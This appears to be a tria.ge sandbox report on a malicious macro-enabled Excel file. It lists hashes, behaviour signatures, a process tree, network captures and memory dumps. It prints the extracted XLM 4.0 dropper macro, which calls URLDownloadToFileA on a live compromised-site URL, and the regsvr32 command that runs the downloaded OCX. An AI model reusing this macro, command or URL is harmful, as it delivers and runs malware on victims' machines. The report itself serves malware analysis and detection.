Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

b9fb685c67...1.xlsm

windows7-x64

10

b9fb685c67...1.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 18:55 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b9fb685c6798605b90ac09b9f7f79e8c7005fe6692dfd96e35c49cf780692a21.xlsm

  • Size

    46KB

  • MD5

    1d0ae7c32b03acddbbc25b8b22f0f1f8

  • SHA1

    9c28dfbb95ade01bd67c98d756b6c3584dd4d0b5

  • SHA256

    b9fb685c6798605b90ac09b9f7f79e8c7005fe6692dfd96e35c49cf780692a21

  • SHA512

    44c74cbcb20878c280a756326880c1e73f0a45c75da55964385c51d1b880c086741928f8c5b0540b568b727d25670091bb0e072feec36c5a2a8321b082ca46f5

  • SSDEEP

    768:X5WHFKfQzXTmbfRzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UP6UCIHcX:XwF+OXabfFtT5fTR4Lh1NisFYBc3cr+z

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://nataliapereira.com/wp-admin/pE8xYY3x6p/", "..\dw1.ocx")
URLs
xlm40.dropper

http://nataliapereira.com/wp-admin/pE8xYY3x6p/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b9fb685c6798605b90ac09b9f7f79e8c7005fe6692dfd96e35c49cf780692a21.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:5060

Network

  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    ukw-azsc-000.roaming.officeapps.live.com
    ukw-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com
    osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com
    IN A
    52.109.32.7
  • flag-gb
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.32.7:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_143
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: ukw-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-2QjDDuxdmtytMtq9+W/5iAChuUSZw4g27hJOX0dZaspGCMhtLHgeCPpG2qdAZuecHfpEzjv8/nNjZLAZFxFCz6YKEuiTicNTb0NsGOnJ27GWXtwrV/RAC7P4Sm0CtO9zo2c7YOmGlQ8uJ6+ef1hiD/a+UMro4eVzLiRXmSIbo6M=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: b40f8fa4-db32-48fd-8245-f62c7ca6b36c
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:55:48 GMT
    Content-Length: 654
  • flag-us
    DNS
    nataliapereira.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    nataliapereira.com
    IN A
    Response
    nataliapereira.com
    IN A
    154.49.245.69
  • flag-fr
    GET
    http://nataliapereira.com/wp-admin/pE8xYY3x6p/
    EXCEL.EXE
    Remote address:
    154.49.245.69:80
    Request
    GET /wp-admin/pE8xYY3x6p/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: nataliapereira.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Wed, 20 Nov 2024 18:55:49 GMT
    server: LiteSpeed
    location: https://nataliapereira.com/wp-admin/pE8xYY3x6p/
    platform: hostinger
    panel: hpanel
    content-security-policy: upgrade-insecure-requests
  • flag-fr
    GET
    https://nataliapereira.com/wp-admin/pE8xYY3x6p/
    EXCEL.EXE
    Remote address:
    154.49.245.69:443
    Request
    GET /wp-admin/pE8xYY3x6p/ HTTP/2.0
    host: nataliapereira.com
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 200
    content-type: text/html
    content-length: 974
    content-encoding: gzip
    vary: Accept-Encoding
    date: Wed, 20 Nov 2024 18:55:50 GMT
    server: LiteSpeed
    cache-control: no-cache,no-store
    x-frame-options: SAMEORIGIN
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
  • flag-us
    DNS
    18.89.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.89.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.32.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.32.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    69.245.49.154.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    69.245.49.154.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    68.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    125.21.192.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    125.21.192.23.in-addr.arpa
    IN PTR
    Response
    125.21.192.23.in-addr.arpa
    IN PTR
    a23-192-21-125deploystaticakamaitechnologiescom
  • flag-us
    DNS
    137.71.105.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    137.71.105.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    40.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    40.134.221.88.in-addr.arpa
    IN PTR
    Response
    40.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-40deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.32.7:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    1.8kB
     8.2kB
     12
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 154.49.245.69:80
    http://nataliapereira.com/wp-admin/pE8xYY3x6p/
    http
    EXCEL.EXE
    870 B
     1.3kB
     12
    4

    HTTP Request

    GET http://nataliapereira.com/wp-admin/pE8xYY3x6p/

    HTTP Response

    301
  • 154.49.245.69:443
    https://nataliapereira.com/wp-admin/pE8xYY3x6p/
    tls, http2
    EXCEL.EXE
    1.4kB
     6.2kB
     17
    13

    HTTP Request

    GET https://nataliapereira.com/wp-admin/pE8xYY3x6p/

    HTTP Response

    200
  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
     243 B
     1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.32.7

  • 8.8.8.8:53
    nataliapereira.com
    dns
    EXCEL.EXE
    64 B
     80 B
     1
    1

    DNS Request

    nataliapereira.com

    DNS Response

    154.49.245.69

  • 8.8.8.8:53
    18.89.109.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    18.89.109.52.in-addr.arpa

  • 8.8.8.8:53
    7.32.109.52.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    7.32.109.52.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    69.245.49.154.in-addr.arpa
    dns
    72 B
     72 B
     1
    1

    DNS Request

    69.245.49.154.in-addr.arpa

  • 8.8.8.8:53
    68.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    68.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    125.21.192.23.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    125.21.192.23.in-addr.arpa

  • 8.8.8.8:53
    137.71.105.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    137.71.105.51.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    40.134.221.88.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    40.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

  • 8.8.8.8:53

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\dw1.ocx
    Filesize

    1KB

    MD5

    1326c16a18441423830933fbb3a6a290

    SHA1

    d62b5f0ec9ae7a82209938c347311519b9fc1084

    SHA256

    3bb40456027c77d05b991e4686f10e51739a6ebdca3e33ec5edcd1e2c28b34cf

    SHA512

    2b9076d43ccc836c89bcd4cc1946008b1d0268edf432d37659960f4ffb9836ca65e638b61305f374ba71b2fa21ac3210482c0e6287288e75bcd44d4fbeb3e528

    Download Submit

  • memory/1980-16-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-10-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-2-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1980-4-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1980-5-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1980-7-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-0-0x00007FFF1486D000-0x00007FFF1486E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1980-9-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-14-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-13-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-3-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1980-15-0x00007FFED2240000-0x00007FFED2250000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1980-6-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-12-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-11-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-8-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-17-0x00007FFED2240000-0x00007FFED2250000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1980-19-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-18-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-1-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1980-38-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-39-0x00007FFF1486D000-0x00007FFF1486E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1980-40-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1980-44-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.